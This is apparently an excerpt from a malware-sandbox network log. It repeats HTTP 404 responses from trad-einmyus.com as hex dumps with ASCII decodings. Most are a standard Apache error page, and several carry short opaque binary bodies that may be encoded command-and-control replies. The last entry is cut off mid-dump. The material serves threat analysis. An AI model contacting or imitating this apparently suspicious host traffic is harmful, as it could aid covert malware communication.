Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 90 51 10 25 01 f1 a0 89 b3 bf 05 ab 11 df 76 be 59 51 96 01 bf ea 26 ed 65 5e 12 b3 f2 92 4a f5 04 0d 0a 30 0d 0a 0d 0a Data Ascii: 35I:82OQ%vYQ&e^J0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 